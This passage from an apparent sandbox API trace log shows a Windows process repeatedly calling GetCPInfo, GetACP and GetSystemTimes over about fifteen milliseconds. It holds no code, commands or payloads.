CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.271] GetACP () returned 0x4e4 [0080.271] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.271] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.271] GetACP () returned 0x4e4 [0080.271] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.271] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.271] GetACP () returned 0x4e4 [0080.271] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.271] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.271] GetACP () returned 0x4e4 [0080.271] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.272] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.272] GetACP () returned 0x4e4 [0080.272] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.272] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.272] GetACP () returned 0x4e4 [0080.272] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.272] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.272] GetACP () returned 0x4e4 [0080.272] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.272] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.272] GetACP () returned 0x4e4 [0080.272] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.273] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.273] GetACP () returned 0x4e4 [0080.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.273] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.273] GetACP () returned 0x4e4 [0080.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.273] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.273] GetACP () returned 0x4e4 [0080.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.273] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.273] GetACP () returned 0x4e4 [0080.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.274] GetACP () returned 0x4e4 [0080.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.274] GetACP () returned 0x4e4 [0080.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.274] GetACP () returned 0x4e4 [0080.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.274] GetACP () returned 0x4e4 [0080.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.274] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.274] GetACP () returned 0x4e4 [0080.274] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.275] GetACP () returned 0x4e4 [0080.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.275] GetACP () returned 0x4e4 [0080.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.275] GetACP () returned 0x4e4 [0080.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.275] GetACP () returned 0x4e4 [0080.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.275] GetACP () returned 0x4e4 [0080.275] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.275] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.275] GetACP () returned 0x4e4 [0080.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.276] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.276] GetACP () returned 0x4e4 [0080.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.276] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.276] GetACP () returned 0x4e4 [0080.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.276] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.276] GetACP () returned 0x4e4 [0080.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.276] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.276] GetACP () returned 0x4e4 [0080.276] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.277] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.277] GetACP () returned 0x4e4 [0080.277] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.277] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.277] GetACP () returned 0x4e4 [0080.277] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.277] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.277] GetACP () returned 0x4e4 [0080.277] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.277] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.277] GetACP () returned 0x4e4 [0080.277] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.277] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.278] GetACP () returned 0x4e4 [0080.278] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.278] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.278] GetACP () returned 0x4e4 [0080.278] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.278] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.278] GetACP () returned 0x4e4 [0080.278] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.278] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.278] GetACP () returned 0x4e4 [0080.278] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.278] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.278] GetACP () returned 0x4e4 [0080.278] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.278] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.278] GetACP () returned 0x4e4 [0080.279] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.279] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.279] GetACP () returned 0x4e4 [0080.279] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.279] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.279] GetACP () returned 0x4e4 [0080.279] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.279] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.279] GetACP () returned 0x4e4 [0080.279] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.279] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.279] GetACP () returned 0x4e4 [0080.279] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.280] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.280] GetACP () returned 0x4e4 [0080.280] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.280] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.280] GetACP () returned 0x4e4 [0080.280] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.280] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.280] GetACP () returned 0x4e4 [0080.280] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.280] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.280] GetACP () returned 0x4e4 [0080.280] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.280] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.280] GetACP () returned 0x4e4 [0080.280] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.280] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.280] GetACP () returned 0x4e4 [0080.281] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.281] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.281] GetACP () returned 0x4e4 [0080.281] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.281] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.281] GetACP () returned 0x4e4 [0080.281] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.281] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.281] GetACP () returned 0x4e4 [0080.281] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.281] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.281] GetACP () returned 0x4e4 [0080.281] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.281] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.281] GetACP () returned 0x4e4 [0080.281] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.281] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.281] GetACP () returned 0x4e4 [0080.282] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.282] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.282] GetACP () returned 0x4e4 [0080.282] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.282] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.282] GetACP () returned 0x4e4 [0080.282] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.282] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.282] GetACP () returned 0x4e4 [0080.282] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.282] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.282] GetACP () returned 0x4e4 [0080.282] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.283] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.283] GetACP () returned 0x4e4 [0080.283] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.283] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.283] GetACP () returned 0x4e4 [0080.283] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.283] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.283] GetACP () returned 0x4e4 [0080.283] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.283] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.283] GetACP () returned 0x4e4 [0080.283] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.283] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.283] GetACP () returned 0x4e4 [0080.283] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.283] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.284] GetACP () returned 0x4e4 [0080.284] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.284] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.284] GetACP () returned 0x4e4 [0080.284] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.284] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.284] GetACP () returned 0x4e4 [0080.284] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.284] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.284] GetACP () returned 0x4e4 [0080.284] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.284] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.284] GetACP () returned 0x4e4 [0080.284] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.284] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.284] GetACP () returned 0x4e4 [0080.284] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.285] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.285] GetACP () returned 0x4e4 [0080.285] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.285] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.285] GetACP () returned 0x4e4 [0080.285] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.285] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.285] GetACP () returned 0x4e4 [0080.285] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.285] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.285] GetACP () returned 0x4e4 [0080.285] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.286] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.286] GetACP () returned 0x4e4 [0080.286] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.286] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.286] GetACP () returned 0x4e4 [0080.286] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.286] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.286] GetACP () returned 0x4e4 [0080.286] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.286] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.286] GetACP () returned 0x4e4 [0080.286] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.286] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.286] GetACP () returned 0x4e4 [0080.286] GetSystemTimes (in: lpIdleTime=0x18fa70, 